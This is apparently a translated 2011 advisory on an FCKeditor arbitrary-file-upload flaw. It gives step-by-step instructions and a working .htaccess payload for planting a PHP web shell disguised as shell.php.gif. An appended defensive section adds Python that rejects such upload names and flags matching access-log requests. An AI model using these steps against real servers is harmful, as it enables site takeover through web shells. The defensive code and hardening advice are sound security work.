FCKeditor arbitrary file upload vulnerability (all PHP versions)
Author: anonymous. Source: compiled by this site. Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create an .htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
2. Now upload this .htaccess file with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html

http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
———————————————————————————————
3. Now upload shell.php.gif with FCKeditor.
4. After uploading shell.php.gif, the name "shell.php.gif" is changed to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. Now the shell is available from the server.
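The defensive counterpart, added here as an example and not part of the advisory or of FCKeditor's own code: an upload-name check that rejects each filename the steps above rely on (the .htaccess of steps 1-2, shell.php.gif of step 3, and a name that already reads shell_php.gif), plus a triage helper for access-log lines that request such a file. The rename model, the executable-extension list and the log format are assumptions.

```python
import re

# Assumption: extensions the PHP host would execute; adjust to the server.
EXECUTABLE_EXTS = ("php", "php3", "php4", "php5", "phtml", "phar")
RENAMED_SCRIPT = re.compile(r"_(?:%s)\.[a-z0-9]+$" % "|".join(EXECUTABLE_EXTS), re.I)


def fckeditor_style_rename(name: str) -> str:
    """Model of the rename in step 4 (not FCKeditor's code): every dot except
    the last becomes an underscore, so 'shell.php.gif' -> 'shell_php.gif'."""
    stem, sep, ext = name.rpartition(".")
    return stem.replace(".", "_") + sep + ext


def upload_name_verdict(name: str) -> str:
    """Return 'ok' if the filename is acceptable, otherwise 'reject: <why>'."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]  # drop any path part
    if not base or base.startswith("."):
        return "reject: dotfile or server configuration file"  # .htaccess
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        return "reject: missing extension"
    if any(p in EXECUTABLE_EXTS for p in parts[1:]):
        return "reject: executable extension inside the name"  # shell.php.gif
    # Renaming only hides the dot: a handler for '_php.gif' still runs the
    # file, so refuse names that look like that after (or without) renaming.
    if RENAMED_SCRIPT.search(fckeditor_style_rename(base)):
        return "reject: executable extension survives rename as '_ext.'"
    return "ok"


def suspicious_request_paths(access_log_lines):
    """Triage access-log lines for requests to a renamed script or a dotfile.
    Returns the request paths; log format assumed to contain '"GET /path'."""
    request = re.compile(r'"(?:GET|POST|HEAD) (\S+)')
    hits = []
    for line in access_log_lines:
        m = request.search(line)
        if not m:
            continue
        path = m.group(1).split("?", 1)[0]
        if RENAMED_SCRIPT.search(path) or path.rsplit("/", 1)[-1].startswith("."):
            hits.append(path)
    return hits


if __name__ == "__main__":  # constructed sample names, not from any real server
    for n in (".htaccess", "shell.php.gif", "shell_php.gif", "photo.gif"):
        print(n, "->", upload_name_verdict(n))
```

Pair the check with a server-side setting that disables PHP execution and .htaccess overrides in the upload directory, since a name filter alone cannot undo a handler that is already in place.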